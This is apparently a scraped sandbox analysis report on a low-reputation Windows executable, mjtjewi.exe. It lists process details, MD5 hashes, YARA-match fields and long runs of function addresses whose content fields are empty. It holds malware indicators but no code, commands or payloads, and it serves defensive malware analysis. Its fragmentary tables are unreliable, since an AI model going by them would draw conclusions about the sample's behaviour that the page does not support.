Target ID: | 3 |
Start time: | 03:20:39 |
Start date: | 03/10/2024 |
Path: | C:\Windows\System32\OpenWith.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff64cf40000 |
File size: | 123'984 bytes |
MD5 hash: | E4A834784FA08C17D47A1E72429C5109 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 03:20:45 |
Start date: | 03/10/2024 |
Path: | C:\Users\user\Desktop\mjtjewi.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xb70000 |
File size: | 371'712 bytes |
MD5 hash: | DB94D5DF4ADD0A06F261EAE73C2DA5DB |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Antivirus matches: |
|
Reputation: | low |
Has exited: | true |
Target ID: | 5 |
Start time: | 03:20:46 |
Start date: | 03/10/2024 |
Path: | C:\Users\user\Desktop\mjtjewi.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x5e0000 |
File size: | 371'712 bytes |
MD5 hash: | DB94D5DF4ADD0A06F261EAE73C2DA5DB |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | low |
Has exited: | false |
Target ID: | 6 |
Start time: | 03:20:46 |
Start date: | 03/10/2024 |
Path: | C:\Users\user\Desktop\mjtjewi.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x7d0000 |
File size: | 371'712 bytes |
MD5 hash: | DB94D5DF4ADD0A06F261EAE73C2DA5DB |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | low |
Has exited: | true |
Target ID: | 7 |
Start time: | 03:20:46 |
Start date: | 03/10/2024 |
Path: | C:\Users\user\Desktop\mjtjewi.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x790000 |
File size: | 371'712 bytes |
MD5 hash: | DB94D5DF4ADD0A06F261EAE73C2DA5DB |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | true |
Function 00007FFE7DE733B5 Relevance: .0, Instructions: 49COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFE7DF4090E Relevance: .0, Instructions: 43COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFE7DF40936 Relevance: .0, Instructions: 34COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFE7DF414D7 Relevance: .0, Instructions: 20COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFE7DF414FF Relevance: .0, Instructions: 13COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Execution Graph
Execution Coverage: | 15.8% |
Dynamic/Decrypted Code Coverage: | 100% |
Signature Coverage: | 18.3% |
Total number of Nodes: | 327 |
Total number of Limit Nodes: | 13 |
Graph
Function 015246C0 Relevance: 6.6, Strings: 5, Instructions: 302COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02DF92B9 Relevance: 4.1, Strings: 3, Instructions: 311COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02DF92E0 Relevance: 4.1, Strings: 3, Instructions: 308COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02DF7053 Relevance: 4.0, Strings: 3, Instructions: 218COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 015245F1 Relevance: 2.9, Strings: 2, Instructions: 375COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0152459F Relevance: 2.9, Strings: 2, Instructions: 375COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 01522462 Relevance: 2.7, Strings: 2, Instructions: 240COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02DF7088 Relevance: 2.7, Strings: 2, Instructions: 201COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 015224D8 Relevance: 2.7, Strings: 2, Instructions: 195COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0152B5B8 Relevance: 2.7, Strings: 2, Instructions: 156COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 015208E1 Relevance: 2.6, Strings: 2, Instructions: 149COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0AC9DDC9 Relevance: 1.6, APIs: 1, Instructions: 144nativeCOMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0AC9DDD0 Relevance: 1.6, APIs: 1, Instructions: 115nativeCOMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0AC9D9F0 Relevance: 1.6, APIs: 1, Instructions: 109nativeCOMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0AC9D9F8 Relevance: 1.6, APIs: 1, Instructions: 106nativeCOMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0AC9DB59 Relevance: 1.6, APIs: 1, Instructions: 103COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02DF5520 Relevance: 1.4, Strings: 1, Instructions: 195COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0152D038 Relevance: 1.4, Strings: 1, Instructions: 171COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02DF7918 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 01526F28 Relevance: 1.3, Strings: 1, Instructions: 73COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0152B858 Relevance: .2, Instructions: 231COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0AC9262E Relevance: .2, Instructions: 206COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 01522D20 Relevance: .2, Instructions: 158COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0AC90B88 Relevance: .2, Instructions: 155COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0AC90B78 Relevance: .2, Instructions: 155COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0AC9E081 Relevance: .1, Instructions: 143COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02DF8392 Relevance: .1, Instructions: 85COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 01523760 Relevance: .1, Instructions: 75COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02DF9920 Relevance: 2.6, Strings: 2, Instructions: 75COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0152171E Relevance: 1.7, APIs: 1, Instructions: 167memoryCOMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0AC9DCA8 Relevance: 1.6, APIs: 1, Instructions: 104memoryCOMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0AC9DCB0 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 015217D0 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0152A2B0 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02DF5444 Relevance: 1.3, Strings: 1, Instructions: 79COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0AF503E2 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02DFAF69 Relevance: 1.3, Strings: 1, Instructions: 52COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02DF5470 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0AF50E24 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0AF51231 Relevance: .1, Instructions: 132COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0AF51240 Relevance: .1, Instructions: 131COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02DF7B49 Relevance: .1, Instructions: 88COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0AF50EB3 Relevance: .1, Instructions: 84COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02DF7C69 Relevance: .1, Instructions: 82COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02DF7B58 Relevance: .1, Instructions: 76COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0AF50F08 Relevance: .1, Instructions: 66COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0AF50274 Relevance: .1, Instructions: 60COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02DF9A32 Relevance: .1, Instructions: 58COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0AF500FD Relevance: .1, Instructions: 58COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02DF8A85 Relevance: .1, Instructions: 56COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02DF9A40 Relevance: .1, Instructions: 56COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0AF5104D Relevance: .1, Instructions: 52COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0AF50955 Relevance: .0, Instructions: 48COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0AF519F2 Relevance: .0, Instructions: 46COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02DFAF78 Relevance: .0, Instructions: 44COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0AF50B7D Relevance: .0, Instructions: 44COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0AF5083B Relevance: .0, Instructions: 43COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0AF506B7 Relevance: .0, Instructions: 41COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02DF8DDF Relevance: .0, Instructions: 32COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0AF50712 Relevance: .0, Instructions: 28COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0AF5053F Relevance: .0, Instructions: 25COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0AF5065D Relevance: .0, Instructions: 23COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0AF5077C Relevance: .0, Instructions: 20COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0AF50604 Relevance: .0, Instructions: 20COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02DFEEC8 Relevance: .0, Instructions: 19COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02DF5E1E Relevance: .0, Instructions: 18COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02DF6F50 Relevance: .0, Instructions: 15COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02DF899B Relevance: .0, Instructions: 11COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 01526A90 Relevance: 5.2, Strings: 4, Instructions: 185COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 01526A80 Relevance: 2.7, Strings: 2, Instructions: 187COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02DF0310 Relevance: 2.7, Strings: 2, Instructions: 174COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02DF0320 Relevance: 2.7, Strings: 2, Instructions: 174COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02DFBA88 Relevance: 2.6, Strings: 2, Instructions: 64COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02DF1778 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02DF176A Relevance: 1.4, Strings: 1, Instructions: 158COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 015218CF Relevance: 1.4, Strings: 1, Instructions: 150COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0152A668 Relevance: .3, Instructions: 269COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02DF7358 Relevance: .3, Instructions: 253COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0AC90006 Relevance: .2, Instructions: 226COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0AC90040 Relevance: .2, Instructions: 210COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 015231E8 Relevance: .2, Instructions: 178COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02DFA208 Relevance: .2, Instructions: 177COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02DFB611 Relevance: .2, Instructions: 174COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02DFB620 Relevance: .2, Instructions: 173COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02DFAFF8 Relevance: .2, Instructions: 165COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02DFA218 Relevance: .2, Instructions: 162COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02DF19C8 Relevance: .1, Instructions: 121COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02DF19D8 Relevance: .1, Instructions: 120COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02DFB8A8 Relevance: .1, Instructions: 112COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 01526D48 Relevance: .1, Instructions: 111COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0AC91FB8 Relevance: .1, Instructions: 111COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 01526862 Relevance: .1, Instructions: 110COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 01526D58 Relevance: .1, Instructions: 108COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02DFB8B8 Relevance: .1, Instructions: 108COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 01526870 Relevance: .1, Instructions: 107COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0AC9BC1A Relevance: .1, Instructions: 97COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0AC91FC8 Relevance: .1, Instructions: 95COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0AF50040 Relevance: .1, Instructions: 92COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0AF50006 Relevance: .1, Instructions: 79COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02DFF218 Relevance: .1, Instructions: 60COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Execution Graph
Execution Coverage: | 3% |
Dynamic/Decrypted Code Coverage: | 0% |
Signature Coverage: | 1.3% |
Total number of Nodes: | 302 |
Total number of Limit Nodes: | 13 |
Graph
Control-flow Graph
APIs |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Function 00404DF3 Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Function 00402C1F Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Function 00413A3F Relevance: 1.5, APIs: 1, Instructions: 12COMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Function 0040D069 Relevance: 12.6, Strings: 10, Instructions: 138COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Function 00402B7C Relevance: 2.5, APIs: 2, Instructions: 20memoryCOMMON
APIs |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Function 00404ED4 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Function 0040317B Relevance: .0, Instructions: 46COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
APIs |
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
APIs |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|